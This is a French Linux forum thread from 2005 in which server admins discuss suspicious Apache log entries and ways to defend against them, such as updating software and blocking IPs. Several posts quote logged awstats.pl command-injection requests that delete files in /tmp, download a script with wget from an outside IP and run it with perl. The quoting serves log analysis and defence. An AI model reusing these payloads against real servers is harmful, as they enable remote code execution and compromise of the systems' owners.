Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
1005 connectés 

  FORUM HardWare.fr
  Linux et OS Alternatifs
  réseaux et sécurité

  [apache] scans port 80 ???

 


 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

[apache] scans port 80 ???

n°738435
initiators
Posté le 07-10-2005 à 17:32:41  profilanswer
 

J'ai des trucs comme ca dans mes logs apache :
 

Code :
  1. 82.226.155.21 - - [07/Oct/2005:15:17:33 +0200] "GET / HTTP/1.0" 200 7401 "-" "-" "-"
  2. 82.226.158.16 - - [07/Oct/2005:15:29:45 +0200] "GET / HTTP/1.0" 200 7401 "-" "-" "-"
  3. 82.226.155.21 - - [07/Oct/2005:15:47:44 +0200] "GET / HTTP/1.0" 200 7401 "-" "-" "-"
  4. 82.226.133.200 - - [07/Oct/2005:16:03:34 +0200] "GET / HTTP/1.0" 200 7401 "-" "-" "-"
  5. 82.226.17.124 - - [07/Oct/2005:16:09:01 +0200] "GET / HTTP/1.0" 200 7401 "-" "-" "-"
  6. 82.226.205.55 - - [07/Oct/2005:16:44:03 +0200] "GET / HTTP/1.0" 200 7401 "-" "-" "-"
  7. 82.226.205.55 - - [07/Oct/2005:16:48:26 +0200] "GET / HTTP/1.0" 200 7401 "-" "-" "-"
  8. 82.226.34.159 - - [07/Oct/2005:16:57:27 +0200] "GET / HTTP/1.0" 200 7401 "-" "-" "-"


 
Pas de referer, pas de user agent, juste un GET / et pas de GET des autres elements de la page d'acceuil.
 
Ces requetes sont beaucoup plus nombreuses depuis 2 mois environ, et viennent a 95% de chez Free (le serveur est sur une Freebox lui aussi).
C'est quoi, juste un scan de port ?

mood
Publicité
Posté le 07-10-2005 à 17:32:41  profilanswer
 

n°738525
jlighty
Posté le 07-10-2005 à 22:44:00  profilanswer
 

ce sont des PC infectés (webdav) qui essayent de lancer des attaques.  

n°738632
DDoS
Posté le 08-10-2005 à 11:10:19  profilanswer
 

jlighty a écrit :

ce sont des PC infectés (webdav) qui essayent de lancer des attaques.


Comment se premunir de se type attaques?.  
 
Il y a des spécialiste de la sécurité pour nous donner des conselle;

n°738633
jlighty
Posté le 08-10-2005 à 11:15:31  profilanswer
 

si c'est apache il n'y a aucun risque il me semble que c'est uniquement pour IIS.

n°738689
fabs0028
Posté le 08-10-2005 à 13:47:40  profilanswer
 

Ah intéressant merci je me posais exactement la même question depuis hier.
Et on peut rien faire pour informer les pauvres infectés ?
 
Bonne après-midi

n°738693
jlighty
Posté le 08-10-2005 à 14:20:30  profilanswer
 

tu contactes le service abuse de leur fai ou tu bannis leur IP (iptables drop)

n°738695
DDoS
Posté le 08-10-2005 à 14:22:33  profilanswer
 

jlighty a écrit :

si c'est apache il n'y a aucun risque il me semble que c'est uniquement pour IIS.


 
Je peux comprendre ton point vu .  
Mais un serveur qui tourne sur iis ou Linux si il est ma configuré laisse des failles c'est certain..  également une installation par defauts..  
 
il y a toujours des enseignements a tenir des spécialistes en sécurite..  
il y a des palteformes client-serveur sous  windows qui fonctionne bien et très bien sécurisé..


Message édité par DDoS le 08-10-2005 à 14:24:32
n°738698
jlighty
Posté le 08-10-2005 à 14:27:27  profilanswer
 

les attaques que initiators a rapporté sont dédiés à IIS non patché. Cependant il ne faut pas oublié qu'Apache n'est pas à l'abris d'attaque ou carrément c'est les scripts CGI (ex: attaque via awstats.pl)
Il faut toujours mettre à jour ses services (FTP, HTTP...) et leur contenu (script php, perl...) que l'on tourne sous Windows ou Linux.


Message édité par jlighty le 08-10-2005 à 14:28:18
n°738829
fabs0028
Posté le 08-10-2005 à 19:20:25  profilanswer
 

Ouais de tte facon faut toujours garder les versions à jours mais perso avec apt y a pas de soucis  ;).
 
Sinon je veux pas leur poser de problèmes mais plutôt les informer qu'ils en ont un mais c sur je vois pas de manière simple pour faire ça avec leur ip.

n°738833
jlighty
Posté le 08-10-2005 à 19:33:23  profilanswer
 

2 solutions :
- soit tu les ignores
- soit tu les blacklists
car si l'abuse de Free réagit, il risque de couper sa connexion jusqu'à ce que l' "attaquant" répare son PC.

mood
Publicité
Posté le 08-10-2005 à 19:33:23  profilanswer
 

n°738834
mikala
Souviens toi du 5 Novembre...
Posté le 08-10-2005 à 19:35:12  profilanswer
 

jlighty a écrit :

2 solutions :
- soit tu les ignores
- soit tu les blacklists
car si l'abuse de Free réagit, il risque de couper sa connexion jusqu'à ce que l' "attaquant" répare son PC.


ce ne serait pas un mal a mon avis .

n°738837
Zzozo
Modérateur
Un peu, passionément, à la fol
Posté le 08-10-2005 à 19:37:18  profilanswer
 

mikala a écrit :

ce ne serait pas un mal a mon avis .


Y'aurait bcp moins d'internautes d'un coup, tiens ...   [:tinostar]


---------------
« Ce qui ne vous tue pas vous rend plus fort » F. Nietzsche | « Vise_ la Lune. Si tu rates, au pire, t'es dans la merde » Un poète disparu dans le cercle
n°738838
mikala
Souviens toi du 5 Novembre...
Posté le 08-10-2005 à 19:38:15  profilanswer
 

Zzozo a écrit :

Y'aurait bcp moins d'internautes d'un coup, tiens ...   [:tinostar]


 
cette économie de BP du coup :love:

n°738845
Zzozo
Modérateur
Un peu, passionément, à la fol
Posté le 08-10-2005 à 19:52:16  profilanswer
 

mikala a écrit :

cette économie de BP du coup :love:


Moins d'emmerdeurs sur les forums  :love:  :love:


---------------
« Ce qui ne vous tue pas vous rend plus fort » F. Nietzsche | « Vise_ la Lune. Si tu rates, au pire, t'es dans la merde » Un poète disparu dans le cercle
n°739389
initiators
Posté le 10-10-2005 à 10:59:25  profilanswer
 

J'ai cherche quelques info sur les attaques sur awstats.pl
J'en ai jamais vu passer sur mon serveur. Je vois surtout passer des trucs destines a des IIS en fait.

n°739394
jlighty
Posté le 10-10-2005 à 11:17:19  profilanswer
 

tu n'as jamais eu de ?
"GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://150.214.140.196/.it/icet;perl%20i
cet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1"


Message édité par jlighty le 10-10-2005 à 11:21:43
n°739457
initiators
Posté le 10-10-2005 à 15:46:57  profilanswer
 

J'ai eu quelques truc dans ce style la:
 
158.170.64.3 - - [12/May/2005:08:47:24 +0200] "GET //cgi-bin/awstats.pl HTTP/1.1" 404 412 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
158.170.64.3 - - [12/May/2005:08:47:24 +0200] "GET //cgi/awstats.pl HTTP/1.1" 404 408 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
158.170.64.3 - - [12/May/2005:08:47:25 +0200] "GET //awstats/awstats.pl HTTP/1.1" 404 412 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
 
 
Et sur un autre serveur j'ai effectivement eu quelques trucs comme ca:
 
203.114.64.241 - - [13/Sep/2005:07:38:38 +0200] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 404 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
203.114.64.241 - - [13/Sep/2005:07:38:39 +0200] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 411 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
203.114.64.241 - - [13/Sep/2005:07:38:40 +0200] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 411 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
 
Mais moins de 10 requetes, et uniquement le 13 septembre.

n°739461
multani
Dépressionnisé
Posté le 10-10-2005 à 16:20:44  profilanswer
 

Zzozo a écrit :

Moins d'emmerdeurs sur les forums  :love:  :love:


 
Plus besoin de modos [:dawa]


Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Linux et OS Alternatifs
  réseaux et sécurité

  [apache] scans port 80 ???

 

Sujets relatifs
mapper un port avec iptables[APACHE ]aucun acces a /cgi-bin
[SARGE] Installation d'une webcam sur port parrallèle[APACHE] prb de lancement de cgi
Apache et VirutualHost....Pb d'accès port 80 sur Apache
faire fonctionner postfix dans un apache "chrooter" : possible ?Comment demarrer Apache avec www-data ?
Réponse : 500 Illegal PORT command 
Plus de sujets relatifs à : [apache] scans port 80 ???


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR